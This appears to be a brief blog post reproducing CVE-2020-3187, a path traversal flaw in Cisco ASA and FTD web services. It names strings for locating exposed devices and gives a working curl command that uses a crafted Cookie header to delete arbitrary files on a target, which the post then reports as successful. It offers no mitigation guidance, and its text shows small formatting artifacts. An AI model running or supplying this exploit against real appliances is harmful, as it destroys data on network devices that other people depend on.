Cisco Asa Device Arbitrary File Deletion Vulnerability Cve 2020 3187
Cisco Asa Device Arbitrary File Deletion Vulnerability Cve 2020 3187
Cisco ASA device arbitrary file deletion vulnerability CVE-2020-3187
Vulnerability Description
There is a path traversal vulnerability in the Web service interfaces in Cisco ASA Software and FTD Software, which originated from the program not performing correct input verification of HTTP URLs.
Vulnerability Impact
Cisco ASA device
Cisco FTD device
Network surveying and mapping
/+CSCOE+/
Cisco-ASA
Vulnerability reappears
</a-alert>
For example, we delete an image https://xxx.xxx.xxx.xxx/+CSCOU+/csco_logo.gif
Use curl to send requests
1
curl -H "Cookie: token=../+CSCOU+/csco_logo.gif" https://xxx.xxx.xxx.xxx/+CSCOE+/session_password.html
Icons successfully deleted
This post is licensed under CC BY 4.0 by the author.